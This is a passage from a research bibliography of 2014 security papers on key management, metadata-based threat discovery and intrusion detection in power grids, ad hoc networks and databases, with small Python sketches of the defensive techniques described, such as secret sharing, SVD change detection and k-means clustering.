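            # Random degree-(k-1) polynomial with the secret as constant term;
            # share i is (i, f(i)), and each share is sent along a different path.
            coeffs = [secret] + [secrets.randbelow(P) for _ in range(k - 1)]
            f = lambda x: sum(c * pow(x, j, P) for j, c in enumerate(coeffs)) % P
            return [(x, f(x)) for x in range(1, n + 1)]

        def reconstruct(shares):
            # Lagrange interpolation at x = 0 recovers the secret from any k shares.
            s = 0
            for xi, yi in shares:
                num = den = 1
                for xj, _ in shares:
                    if xj != xi:
                        num = num * -xj % P
                        den = den * (xi - xj) % P
                s = (s + yi * num * pow(den, -1, P)) % P
            return s

        key = secrets.randbelow(P)             # the symmetric message key
        shares = split(key, n=5, k=3)          # 5 disjoint paths, threshold 3
        assert reconstruct(shares[:3]) == key
        assert reconstruct(shares[2:]) == key  # any 3 shares suffice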
  • Holger Kuehner, Hannes Hartenstein, "Spoilt for Choice: Graph-Based Assessment Of Key Management Protocols To Share Encrypted Data," CODASPY '14 Proceedings of the 4th ACM Conference on Data and Application Security and Privacy, March 2014, Pages 147-150. doi: 10.1145/2557547.2557583 Sharing data with client-side encryption requires key management. Selecting an appropriate key management protocol for a given scenario is hard, since the interdependency between scenario parameters and the resource consumption of a protocol is often known only for artificial, simplified scenarios. In this paper, we explore the resource consumption of systems that offer sharing of encrypted data within real-world scenarios, which are typically complex and determined by many parameters. For this purpose, we first collect empirical data that represents real-world scenarios by monitoring large-scale services within our organization. We then use this data to parameterize a resource consumption model that is based on the key graph generated by each key management protocol. Our preliminary simulation runs indicate that this key-graph-based model can be used to estimate the resource consumption of real-world systems for sharing encrypted data.
    Keywords: key management protocols, workloads (ID#:14-2165)
    URL: http://dl.acm.org/citation.cfm?id=2557547.2557583&coll=DL&dl=GUIDE or http://doi.acm.org/10.1145/2557547.2557583
  • Damiano Macedonio, Massimo Merro, "A Semantic Analysis Of Key Management Protocols For Wireless Sensor Networks," Science of Computer Programming, Volume 81, February 2014, Pages 53-78. doi: 10.1016/j.scico.2013.01.005 Gorrieri and Martinelli's timed Generalized Non-Deducibility on Compositions (tGNDC) schema is a well-known general framework for the formal verification of security protocols in a concurrent scenario. We generalise the tGNDC schema to verify wireless network security protocols. Our generalisation relies on a simple timed broadcasting process calculus whose operational semantics is given in terms of a labelled transition system, which is used to derive a standard simulation theory. We apply our tGNDC framework to perform a security analysis of three well-known key management protocols for wireless sensor networks: μTESLA, LEAP+ and LiSP.
    Keywords: Key management protocol, Process calculus, Security analysis, Wireless sensor networks (ID#:14-2170)
    URL: http://dl.acm.org/citation.cfm?id=2565891.2566132&coll=DL&dl=GUIDE or http://dx.doi.org/10.1016/j.scico.2013.01.005

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Metadata Discovery Problem

Metadata Discovery Problem


Metadata is often described as "data about data." Usage varies from virtualization to data warehousing to statistics. Because of its volume and complexity, metadata has the potential to tax security procedures and processes. A recent workshop described a Metadata-based Malicious Cyber Discovery Problem and solicited research and papers. The bibliography presented here provides a number of papers published early in 2014.

  • Khanuja, H.; Suratkar, S.S., "Role of Metadata In Forensic Analysis Of Database Attacks," Advance Computing Conference (IACC), 2014 IEEE International, vol., no., pp.457,462, 21-22 Feb. 2014. With the spectacular increase in online activities like e-transactions, security and privacy issues have never been more significant. Large numbers of database security breaches occur daily. There is therefore a crucial need in the field of database forensics to make several redundant copies of sensitive data found in database server artifacts, audit logs, cache, table storage, etc. for analysis purposes. A large volume of metadata is available in the database infrastructure for investigation purposes, but most of the effort lies in retrieving and analyzing that information from computing systems. In this paper we focus on the significance of metadata in database forensics. We propose a system to perform forensic analysis of a database by generating its metadata file independently of the DBMS system used. We also aim to generate digital evidence against criminals, suitable for presentation in a court of law, in the form of who, when, why, what, how and where the fraudulent transaction occurred. We thus present a system that detects major database attacks as well as anti-forensics attacks through an open source database forensics tool. Finally, we point out the challenges in the field of database forensics and how these challenges can be used as opportunities to stimulate the area.
    Keywords: data privacy; digital forensics; law; metadata; anti-forensics attacks; audit logs; cache; court of law; database attacks; database security breaches; database server artifacts; digital evidence; e-transactions; forensic analysis; fraudulent transaction; information analysis; information retrieval; metadata; online activities; open source database forensics tool; privacy issue; security issue; table storage; Conferences; Handheld computers; Database forensics; SQL injection; anti-forensics attacks; digital notarization; linked hash technique; metadata; reconnaissance attack; trail obfuscation (ID#:14-2171)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779367&isnumber=6779283
  • Vollmer, T.; Manic, M.; Linda, O., "Autonomic Intelligent Cyber-Sensor to Support Industrial Control Network Awareness," Industrial Informatics, IEEE Transactions on, vol.10, no.2, pp.1647,1658, May 2014 The proliferation of digital devices in a networked industrial ecosystem, along with an exponential growth in complexity and scope, has resulted in elevated security concerns and management complexity issues. This paper describes a novel architecture utilizing concepts of autonomic computing and a simple object access protocol (SOAP)-based interface to metadata access points (IF-MAP) external communication layer to create a network security sensor. This approach simplifies integration of legacy software and supports a secure, scalable, and self-managed framework. The contribution of this paper is twofold: 1) A flexible two-level communication layer based on autonomic computing and service oriented architecture is detailed and 2) three complementary modules that dynamically reconfigure in response to a changing environment are presented. One module utilizes clustering and fuzzy logic to monitor traffic for abnormal behavior. Another module passively monitors network traffic and deploys deceptive virtual network hosts. These components of the sensor system were implemented in C++ and PERL and utilize a common internal D-Bus communication mechanism. A proof of concept prototype was deployed on a mixed-use test network showing the possible real-world applicability. In testing, 45 of the 46 network attached devices were recognized and 10 of the 12 emulated devices were created with specific operating system and port configurations. In addition, the anomaly detection algorithm achieved a 99.9% recognition rate. All output from the modules were correctly distributed using the common communication structure.
    Keywords: access protocols; computer network security; fault tolerant computing; field buses; fuzzy logic; industrial control; intelligent sensors; metadata; network interfaces; pattern clustering; C++; IF-MAP; PERL; SOAP-based interface; anomaly detection algorithm; autonomic computing; autonomic intelligent cyber-sensor; digital device proliferation; flexible two-level communication layer; fuzzy logic; industrial control network awareness; internal D-Bus communication mechanism; legacy software; metadata access point external communication layer; mixed-use test network; network security sensor; networked industrial ecosystem; proof of concept prototype; self-managed framework; service oriented architecture; simple object access protocol-based interface; traffic monitor; virtual network hosts; Autonomic computing; control systems; industrial ecosystems; network security; service-oriented architecture. (ID#:14-2172)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6547755&isnumber=6809862
  • Afzal Butt, Muhammad Irfan, "BIOS Integrity And Advanced Persistent Threat," Information Assurance and Cyber Security (CIACS), 2014 Conference on, vol., no., pp.47,50, 12-13 June 2014. Basic Input Output System (BIOS) is the most important component of a computer system by virtue of its role: it holds the code which is executed at startup. It is considered the trusted computing base, and its integrity is extremely important for smooth functioning of the system. On the other hand, the BIOS of new computer systems (servers, laptops, desktops, network devices, and other embedded systems) can be easily upgraded using a flash or capsule mechanism, which can introduce new vulnerabilities through malicious code, accidental incidents, or deliberate attack. The recent attack on the Iranian nuclear plant (Stuxnet) is an example of an advanced persistent attack. This attack vector adds a new dimension to the information security (IS) spectrum, which needs to be guarded by a holistic approach employed at the enterprise level. Malicious BIOS upgrades can also cause denial of service, theft of information, or the addition of new backdoors which can be exploited by attackers to cause business loss, passive eavesdropping, or total destruction of the system without the knowledge of the user. To address this challenge, a capability for verification of BIOS integrity needs to be developed, and due diligence must be observed for proactive resolution of the issue. This paper explains BIOS integrity threats and presents a prevention strategy for effective and proactive resolution.
    Keywords: Advanced Persistent Threat (APT); BIOS Integrity Measurement; Original Equipment Manufacturer (OEM); Roots of Trust (RoTs); Trusted Computing (ID#:14-2173)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861331&isnumber=6861314
  • Ling, Zhen; Luo, Junzhou; Wu, Kui; Yu, Wei; Fu, Xinwen, "TorWard: Discovery of Malicious Traffic Over Tor," INFOCOM, 2014 Proceedings IEEE , vol., no., pp.1402,1410, April 27 2014-May 2 2014. Tor is a popular low-latency anonymous communication system. However, it is currently abused in various ways. Tor exit routers are frequently troubled by administrative and legal complaints. To gain an insight into such abuse, we design and implement a novel system, TorWard, for the discovery and systematic study of malicious traffic over Tor. The system can avoid legal and administrative complaints and allows the investigation to be performed in a sensitive environment such as a university campus. An IDS (Intrusion Detection System) is used to discover and classify malicious traffic. We performed comprehensive analysis and extensive real-world experiments to validate the feasibility and effectiveness of TorWard. Our data shows that around 10% Tor traffic can trigger IDS alerts. Malicious traffic includes P2P traffic, malware traffic (e.g., botnet traffic), DoS (Denial-of-Service) attack traffic, spam, and others. Around 200 known malware have been identified. To the best of our knowledge, we are the first to perform malicious traffic categorization over Tor.
    Keywords: Bandwidth; Computers; Logic gates; Malware; Mobile handsets; Ports (Computers); Servers; Intrusion Detection System; Malicious Traffic; Tor (ID#:14-2174)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848074&isnumber=6847911
  • Goseva-Popstojanova, Katerina; Dimitrijevikj, Ana, "Distinguishing between Web Attacks and Vulnerability Scans Based on Behavioral Characteristics," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on, vol., no., pp.42,48, 13-16 May 2014. The number of vulnerabilities and reported attacks on Web systems show increasing trends, which clearly illustrate the need for a better understanding of malicious cyber activities. In this paper we use clustering to classify attacker activities aimed at Web systems. The empirical analysis is based on four datasets, each several months in duration, collected by high-interaction honeypots. The results show that behavioral clustering analysis can be used to distinguish between attack sessions and vulnerability scan sessions. However, the performance heavily depends on the dataset. Furthermore, the results show that attacks differ from vulnerability scans in a small number of features (i.e., session characteristics). Specifically, for each dataset, the best feature selection method (in terms of high probability of detection and low probability of false alarm) selects only three features and results in three to four clusters, significantly improving the performance of clustering compared to the case when all features are used. The best subset of features and the extent of the improvement, however, also depend on the dataset.
    Keywords: Web applications; attacks; classification of malicious cyber activities; honeypots; vulnerability scans (ID#:14-2175)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844611&isnumber=6844560
  • Pajic, Miroslav; Weimer, James; Bezzo, Nicola; Tabuada, Paulo; Sokolsky, Oleg; Lee, Insup; Pappas, George J., "Robustness of Attack-Resilient State Estimators," Cyber-Physical Systems (ICCPS), 2014 ACM/IEEE International Conference on, vol., no., pp.163,174, 14-17 April 2014. The interaction between information technology and the physical world makes Cyber-Physical Systems (CPS) vulnerable to malicious attacks beyond the standard cyber attacks. This has motivated the need for attack-resilient state estimation. Yet, the existing state-estimators are based on the non-realistic assumption that the exact system model is known. Consequently, in this work we present a method for state estimation in presence of attacks, for systems with noise and modeling errors. When the estimated states are used by a state-based feedback controller, we show that the attacker cannot destabilize the system by exploiting the difference between the model used for the state estimation and the real physical dynamics of the system. Furthermore, we describe how implementation issues such as jitter, latency and synchronization errors can be mapped into parameters of the state estimation procedure that describe modeling errors, and provide a bound on the state-estimation error caused by modeling errors. This enables mapping control performance requirements into real-time (i.e., timing related) specifications imposed on the underlying platform. Finally, we illustrate and experimentally evaluate this approach on an unmanned ground vehicle case-study.
    Keywords: (not provided) (ID#:14-2176)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6843720&isnumber=6843703
  • Sanandaji, Borhan M.; Bitar, Eilyan; Poolla, Kameshwar; Vincent, Tyrone L., "An Abrupt Change Detection Heuristic With Applications To Cyber Data Attacks On Power Systems," American Control Conference (ACC), 2014 , vol., no., pp.5056,5061, 4-6 June 2014. We present an analysis of a heuristic for abrupt change detection of systems with bounded state variations. The proposed analysis is based on the Singular Value Decomposition (SVD) of a history matrix built from system observations. We show that monitoring the largest singular value of the history matrix can be used as a heuristic for detecting abrupt changes in the system outputs. We provide sufficient detectability conditions for the proposed heuristic. As an application, we consider detecting malicious cyber data attacks on power systems and test our proposed heuristic on the IEEE 39-bus testbed.
    Keywords: History; Monitoring; Noise level; Power system dynamics; Time measurement; Vectors; Fault detection/accommodation; Power systems (ID#:14-2177)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6859403&isnumber=6858556
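    The heuristic above fits in a few lines of NumPy: slide a window of recent observations into a history matrix and raise an alarm when its largest singular value jumps. A minimal sketch on synthetic data; the window size and threshold are illustrative, not the paper's tuning.

        import numpy as np

        def largest_singular_value(window: np.ndarray) -> float:
            # window: (w x m) history matrix of the last w observation vectors
            return np.linalg.svd(window, compute_uv=False)[0]

        rng = np.random.default_rng(0)
        m, w, thresh = 8, 20, 2.0
        stream = rng.normal(0.0, 0.1, size=(200, m))
        stream[120:] += 1.5                    # abrupt change, e.g. injected data

        baseline = None
        for t in range(w, len(stream)):
            sigma = largest_singular_value(stream[t - w:t])
            if baseline is None:
                baseline = sigma               # calibrate on the first full window
            elif sigma > thresh * baseline:
                print(f"abrupt change flagged at t={t}")
                break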
  • Farzan, F.; Jafari, M.A; Wei, D.; Lu, Y., "Cyber-related risk assessment and critical asset identification in power grids," Innovative Smart Grid Technologies Conference (ISGT), 2014 IEEE PES, vol., no., pp.1,5, 19-22 Feb. 2014. This paper proposes a methodology to assess cyber-related risks and to identify critical assets at both the power grid and substation levels. The methodology is based on a two-pass engine model. The first-pass engine is developed to identify the most critical substation(s) in a power grid; a mixture of analytical hierarchy process (AHP) and (N-1) contingency analysis is used to calculate risks. The second-pass engine is developed to identify risky assets within a substation and to reduce the vulnerability of a substation to the intrusions and malicious acts of cyber hackers. The risk methodology uniquely combines asset reliability, vulnerability and cost of attack into a risk index. A methodology is also presented to improve the overall security of a substation by optimally placing security agent(s) on the automation system.
    Keywords: Automation; Indexes; Modeling; Power grids; Reliability; Security; Substations; cyber security; cyber vulnerability; electrical power grids; risk assessment; substation (ID#:14-2178)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816371&isnumber=6816367
  • Tang, Lu-An; Han, Jiawei; Jiang, Guofei, "Mining sensor data in cyber-physical systems," Tsinghua Science and Technology , vol.19, no.3, pp.225,234, June 2014. A Cyber-Physical System (CPS) integrates physical devices (i.e., sensors) with cyber (i.e., informational) components to form a context sensitive system that responds intelligently to dynamic changes in real-world situations. Such a system has wide applications in the scenarios of traffic control, battlefield surveillance, environmental monitoring, and so on. A core element of CPS is the collection and assessment of information from noisy, dynamic, and uncertain physical environments integrated with many types of cyber-space resources. The potential of this integration is unbounded. To achieve this potential the raw data acquired from the physical world must be transformed into useable knowledge in real-time. Therefore, CPS brings a new dimension to knowledge discovery because of the emerging synergism of the physical and the cyber. The various properties of the physical world must be addressed in information management and knowledge discovery. This paper discusses the problems of mining sensor data in CPS: With a large number of wireless sensors deployed in a designated area, the task is real time detection of intruders that enter the area based on noisy sensor data. The framework of IntruMine is introduced to discover intruders from untrustworthy sensor data. IntruMine first analyzes the trustworthiness of sensor data, then detects the intruders' locations, and verifies the detections based on a graph model of the relationships between sensors and intruders.
    Keywords: cyber-physical system; data trustworthiness; sensor network (ID#:14-2179)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838193&isnumber=6838190
  • Hong, Junho; Liu, Chen-Ching; Govindarasu, Manimaran, "Detection of cyber intrusions using network-based multicast messages for substation automation," Innovative Smart Grid Technologies Conference (ISGT), 2014 IEEE PES, vol., no., pp.1,5, 19-22 Feb. 2014. This paper proposes a new network-based cyber intrusion detection system (NIDS) using multicast messages in substation automation systems (SASs). The proposed network-based intrusion detection system monitors anomalies and malicious activities of multicast messages based on IEC 61850, e.g., Generic Object Oriented Substation Event (GOOSE) and Sampled Value (SV). NIDS detects anomalies and intrusions that violate predefined security rules using a specification-based algorithm. The performance test has been conducted for different cyber intrusion scenarios (e.g., packet modification, replay and denial-of-service attacks) using a cyber security testbed. The IEEE 39-bus system model has been used for testing of the proposed intrusion detection method for simultaneous cyber attacks. The false negative ratio (FNR) is the number of misclassified abnormal packets divided by the total number of abnormal packets. The results demonstrate that the proposed NIDS achieves a low false negative rate.
    Keywords: Computer security; Educational institutions; IEC standards; Intrusion detection; Substation automation; Cyber Security of Substations; GOOSE and SV; Intrusion Detection System; Network Security (ID#:14-2180)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816375&isnumber=6816367
  • Sumit, S.; Mitra, D.; Gupta, D., "Proposed Intrusion Detection on ZRP based MANET by effective k-means clustering method of data mining," Optimization, Reliabilty, and Information Technology (ICROIT), 2014 International Conference on, vol., no., pp.156,160, 6-8 Feb. 2014. Mobile Ad-Hoc Networks (MANETs) consist of peer-to-peer, infrastructure-less communicating nodes that are highly dynamic, which makes routing data challenging. Routing protocols for such networks face the challenges of random topology change, the nature of links (symmetric or asymmetric), and power requirements during data transmission. Under such circumstances, both proactive and reactive routing are usually inefficient. We consider the zone routing protocol (ZRP), which combines the qualities of the proactive (IARP) and reactive (IERP) protocols. In ZRP, an updated topological map of the zone centered on each node is maintained, so immediate routes are available inside each zone. To communicate outside a zone, a route discovery mechanism is employed, aided by the local routing information of the zones. In MANETs, security is always an issue: a node can turn malicious and hamper the normal flow of packets. To overcome this issue, we use a clustering technique to separate nodes exhibiting intrusive behavior from those exhibiting normal behavior. We call this technique effective k-means clustering; it is motivated by k-means. We propose to implement an Intrusion Detection System on each node of a MANET that uses ZRP for packet flow, and then to use effective k-means to separate the malicious nodes from the network. The ad hoc network is thus freed from malicious activity, and the normal flow of packets becomes possible.
    Keywords: data mining; mobile ad hoc networks; mobile computing; peer-to-peer computing; routing protocols; telecommunication security; k-means clustering method; MANET security; ZRP based MANET; ad-hoc network; clustering technique; data mining; data transmission; intrusion detection system; intrusive behavior; k-means; local routing information; malicious activity; malicious nodes; mobile ad-hoc networks; packet flow; peer-to-peer infrastructure; proactive protocols; random topology; reactive protocols; route discovery mechanism; route discovery procedure; routing data; zone routing protocol; Flowcharts; Mobile ad hoc networks; Mobile computing; Protocols; Routing; IARP; IDS; effective k-means clustering; IERP; MANET; ZRP (ID#:14-2181)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798303&isnumber=6798279
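    The separation step can be sketched with ordinary k-means over per-node behavioral features, assuming scikit-learn is available. The two features below (packet-forwarding ratio and route-request rate) are illustrative stand-ins for whatever audit data each node's IDS collects, not the authors' exact feature set.

        import numpy as np
        from sklearn.cluster import KMeans

        # One row per neighbor node: [fraction of packets forwarded, RREQs/minute]
        features = np.array([
            [0.97, 1.2], [0.95, 0.8], [0.99, 1.0], [0.96, 1.1],  # normal nodes
            [0.12, 9.5], [0.08, 11.0],                           # suspected intruders
        ])

        labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(features)

        # Treat the cluster with the lower mean forwarding ratio as malicious.
        mal = min((0, 1), key=lambda c: features[labels == c, 0].mean())
        print("nodes flagged for isolation:", np.where(labels == mal)[0])  # [4 5]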
  • Boukhtouta, Amine; Lakhdari, Nour-Eddine; Debbabi, Mourad, "Inferring Malware Family through Application Protocol Sequences Signature," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on, vol., no., pp.1,5, March 30 2014-April 2 2014. The rapid emergence of cyber-threats exerting pressure on today's cyberspace calls for practical and efficient capabilities for malware traffic detection. In this paper, we propose an extension to an initial research effort, namely fingerprinting malicious traffic, by putting an emphasis on attributing maliciousness to malware families. The technique proposed in the previous work establishes a synergy between automatic dynamic analysis of malware and machine learning to fingerprint badness in network traffic. Machine learning algorithms are used with features that exploit only high-level properties of traffic packets (e.g., packet headers). Beyond the detection of malicious packets, we want to enhance the fingerprinting capability with the identification of the malware families responsible for generating the malicious packets. The identification of the underlying malware family is derived from a sequence of application protocols, which is used as a signature for the family in question. Our results show that the technique achieves a promising malware family identification rate with low false positives.
    Keywords: (not provided) (ID#:14-2182)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814026&isnumber=6813963
  • Sayed, Bassam; Traore, Issa, "Protection against Web 2.0 Client-Side Web Attacks Using Information Flow Control," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.261,268, 13-16 May 2014. The dynamic nature of the Web 2.0 and the heavy obfuscation of web-based attacks complicate the job of the traditional protection systems such as Firewalls, Anti-virus solutions, and IDS systems. It has been witnessed that using ready-made toolkits, cyber-criminals can launch sophisticated attacks such as cross-site scripting (XSS), cross-site request forgery (CSRF) and botnets to name a few. In recent years, cyber-criminals have targeted legitimate websites and social networks to inject malicious scripts that compromise the security of the visitors of such websites. This involves performing actions using the victim browser without his/her permission. This poses the need to develop effective mechanisms for protecting against Web 2.0 attacks that mainly target the end-user. In this paper, we address the above challenges from information flow control perspective by developing a framework that restricts the flow of information on the client-side to legitimate channels. The proposed model tracks sensitive information flow and prevents information leakage from happening. The proposed model when applied to the context of client-side web-based attacks is expected to provide a more secure browsing environment for the end-user.
    Keywords: AJAX; Client-side web attacks ;Information Flow Control; Web 2.0 (ID#:14-2183)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844648&isnumber=6844560
  • Hong, J.; Liu, C.-C.; Govindarasu, M., "Integrated Anomaly Detection for Cyber Security of the Substations," Smart Grid, IEEE Transactions on , vol.5, no.4, pp.1643,1653, July 2014. Cyber intrusions to substations of a power grid are a source of vulnerability since most substations are unmanned and with limited protection of the physical security. In the worst case, simultaneous intrusions into multiple substations can lead to severe cascading events, causing catastrophic power outages. In this paper, an integrated Anomaly Detection System (ADS) is proposed which contains host- and network-based anomaly detection systems for the substations, and simultaneous anomaly detection for multiple substations. Potential scenarios of simultaneous intrusions into the substations have been simulated using a substation automation testbed. The host-based anomaly detection considers temporal anomalies in the substation facilities, e.g., user-interfaces, Intelligent Electronic Devices (IEDs) and circuit breakers. The malicious behaviors of substation automation based on multicast messages, e.g., Generic Object Oriented Substation Event (GOOSE) and Sampled Measured Value (SMV), are incorporated in the proposed network-based anomaly detection. The proposed simultaneous intrusion detection method is able to identify the same type of attacks at multiple substations and their locations. The result is a new integrated tool for detection and mitigation of cyber intrusions at a single substation or multiple substations of a power grid.
    Keywords: Circuit breakers; Computer security; Intrusion detection; Power grids; Substation automation; Anomaly detection; GOOSE anomaly detection; SMV anomaly detection and intrusion detection; cyber security of substations (ID#:14-2185)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6786500&isnumber=6839066
  • Tsoutsos, N.G.; Maniatakos, M., "Fabrication Attacks: Zero-Overhead Malicious Modifications Enabling Modern Microprocessor Privilege Escalation," Emerging Topics in Computing, IEEE Transactions on , vol.2, no.1, pp.81,93, March 2014. The wide deployment of general purpose and embedded microprocessors has emphasized the need for defenses against cyber-attacks. Due to the globalized supply chain, however, there are several stages where a processor can be maliciously modified. The most promising stage, and the hardest during which to inject the hardware trojan, is the fabrication stage. As modern microprocessor chips are characterized by very dense, billion-transistor designs, such attacks must be very carefully crafted. In this paper, we demonstrate zero overhead malicious modifications on both high-performance and embedded microprocessors. These hardware trojans enable privilege escalation through execution of an instruction stream that excites the necessary conditions to make the modification appear. The minimal footprint, however, comes at the cost of a small window of attack opportunities. Experimental results show that malicious users can gain escalated privileges within a few million clock cycles. In addition, no system crashes were reported during normal operation, rendering the modifications transparent to the end user.
    Keywords: Computer architecture; Embedded systems; Fabrication; Hardware; logic gates; Microprocessors; Trojan horses; Hardware trojans; fabrication attacks; malicious modification; microprocessors; privilege escalation; zero overhead (ID#:14-2186)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6646239&isnumber=6824880
  • Pathan, AC.; Potey, M.A, "Detection of Malicious Transaction in Database Using Log Mining Approach," Electronic Systems, Signal Processing and Computing Technologies (ICESC), 2014 International Conference on, vol., no., pp.262,265, 9-11 Jan. 2014. Data mining is the process of finding correlations in relational databases. There are different techniques for identifying malicious database transactions: while many existing approaches profile SQL query structures and database user activities to detect intrusions, the log mining approach automatically discovers anomalous database transactions. Mining the data is very helpful for extracting useful business information from large databases. Multi-level and multi-dimensional data mining are employed to discover data item dependency rules, data sequence rules, domain dependency rules, and domain sequence rules from the database log containing legitimate transactions. Database transactions that do not comply with the rules are identified as malicious transactions. The log mining approach can achieve the desired true and false positive rates when the confidence and support thresholds are set appropriately. The implemented system incrementally maintains the data dependency rule sets and optimizes the performance of the intrusion detection process.
    Keywords: SQL; data mining; relational databases; security of data; SQL; anomalous database transactions; automatic discovery; data mining; data sequence rules; domain dependency rules; intrusion detection; log mining approach; malicious transaction detection; query database; query structures; relational databases; Computers; Data mining; Database systems; Intrusion detection; Training; Data Mining; Database security; Intrusion Detection (ID#:14-2187)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6745384&isnumber=6745317
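    The rule-checking half of the approach admits a compact sketch: rules mined from the legitimate log state which operations must precede a given operation within one transaction, and any transaction violating a rule is flagged as malicious. The rule set below is purely illustrative:

        # Mined data-dependency rules: before a transaction performs the key
        # operation, it must already have performed the listed operations.
        RULES = {
            "write:accounts.balance": {"read:accounts.balance"},
            "write:audit.log": {"write:accounts.balance"},
        }

        def is_malicious(transaction_ops) -> bool:
            seen = set()
            for op in transaction_ops:
                if not RULES.get(op, set()) <= seen:
                    return True       # a required predecessor is missing
                seen.add(op)
            return False

        legit = ["read:accounts.balance", "write:accounts.balance", "write:audit.log"]
        attack = ["write:accounts.balance"]   # blind overwrite with no prior read
        assert not is_malicious(legit)
        assert is_malicious(attack)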
  • Desai, N.N.; Diwanji, H.; Shah, J.S., "A temporal packet marking detection scheme against MIRA attack in MANET," Engineering and Computational Sciences (RAECS), 2014 Recent Advances in, vol., no., pp.1,5, 6-8 March 2014. Mobile ad-hoc networks are highly susceptible to security attacks due to their dynamic topology, resource and energy constraints, limited physical security, and lack of infrastructure. The misleading routing attack (MIRA) in MANETs intends to delay packets as long as possible so that timeouts are generated at the source as packets fail to arrive in time. Its main objective is to generate delay and increase network overhead; it is a variation of the sinkhole attack. In this paper, we propose a detection scheme to detect malicious nodes at route discovery as well as during packet transmission. Simulation results for the MIRA attack indicate that although delay is increased by 91.30%, throughput is not affected, which suggests that the misleading routing attack is difficult to detect. When the proposed detection scheme is applied to the misleading routing attack, delay decreases significantly.
    Keywords: mobile ad hoc networks; packet radio networks; telecommunication network routing; telecommunication network topology; telecommunication security; MANET; MIRA attack; delay packet; dynamic topology; energy constraint operations; malicious nodes detection; misleading routing attack; mobile ad-hoc network; packet marking detection scheme; packet transmission; physical security; resource constraint; Delays; IP networks; Mobile ad hoc networks; Routing; Security; Throughput; Topology; MANET; Misleading routing attack (MIRA); clustering; packet marking; time behavior (ID#:14-2188)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799560&isnumber=6799496
  • Bou-Harb, Elias; Debbabi, Mourad; Assi, Chadi, "Behavioral analytics for inferring large-scale orchestrated probing events," Computer Communications Workshops (INFOCOM WKSHPS), 2014 IEEE Conference on, vol., no., pp.506,511, April 27 2014-May 2 2014. The significant dependence on cyberspace has indeed brought new risks that often compromise, exploit and damage invaluable data and systems. Thus, the capability to proactively infer malicious activities is of paramount importance, and inferring probing events, which are commonly the first stage of any cyber attack, is a promising tactic for achieving that task. We have been receiving for the past three years 12 GB of daily malicious real darknet data (i.e., Internet traffic destined to half a million routable yet unallocated IP addresses) from more than 12 countries. This paper exploits such data to propose a novel approach that aims at capturing the behavior of the probing sources in an attempt to infer their orchestration (i.e., coordination) pattern. The latter defines a recently discovered characteristic of a new phenomenon of probing events that could be ominously leveraged to cause drastic Internet-wide and enterprise impacts as precursors of various cyber attacks. To accomplish its goals, the proposed approach leverages various signal and statistical techniques, information-theoretic metrics, fuzzy approaches with real malware traffic, and data mining methods. The approach is validated through one use case which arguably proves that a previously analyzed orchestrated probing event from last year is indeed still active, yet operating in a stealthy, very low rate mode. We envision that the proposed approach, which is tailored towards darknet data that is frequently, abundantly and effectively used to generate cyber threat intelligence, could be used by network security analysts, emergency response teams and/or observers of cyber events to infer large-scale orchestrated probing events for early cyber attack warning and notification.
    Keywords: Conferences; IP networks; Internet; Malware; Probes (ID#:14-2189)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6849283&isnumber=6849127
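    One information-theoretic building block of such analytics, testing whether a probing source sweeps the monitored address space rather than hammering one target, reduces to a Shannon-entropy computation over flow destinations. A minimal sketch; the threshold and field choices are illustrative assumptions, not the paper's method.

        import math
        from collections import Counter

        def shannon_entropy(values) -> float:
            counts = Counter(values)
            total = sum(counts.values())
            return -sum((c / total) * math.log2(c / total) for c in counts.values())

        def looks_like_sweep(dest_addresses, min_bits=6.0) -> bool:
            # A horizontal scan touches many distinct darknet addresses, so the
            # destination entropy of its flows is high.
            return shannon_entropy(dest_addresses) >= min_bits

        sweep = [f"10.0.{i // 256}.{i % 256}" for i in range(200)]  # 200 targets
        single = ["10.0.0.1"] * 200                                 # one target
        assert looks_like_sweep(sweep)       # entropy = log2(200), about 7.6 bits
        assert not looks_like_sweep(single)  # entropy = 0 bits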
  • Nitti, M.; Girau, R.; Atzori, L., "Trustworthiness Management in the Social Internet of Things," Knowledge and Data Engineering, IEEE Transactions on , vol.26, no.5, pp.1253,1266, May 2014. The integration of social networking concepts into the Internet of things has led to the Social Internet of Things (SIoT) paradigm, according to which objects are capable of establishing social relationships in an autonomous way with respect to their owners with the benefits of improving the network scalability in information/service discovery. Within this scenario, we focus on the problem of understanding how the information provided by members of the social IoT has to be processed so as to build a reliable system on the basis of the behavior of the objects. We define two models for trustworthiness management starting from the solutions proposed for P2P and social networks. In the subjective model each node computes the trustworthiness of its friends on the basis of its own experience and on the opinion of the friends in common with the potential service providers. In the objective model, the information about each node is distributed and stored making use of a distributed hash table structure so that any node can make use of the same information. Simulations show how the proposed models can effectively isolate almost any malicious nodes in the network at the expenses of an increase in the network traffic for feedback exchange.
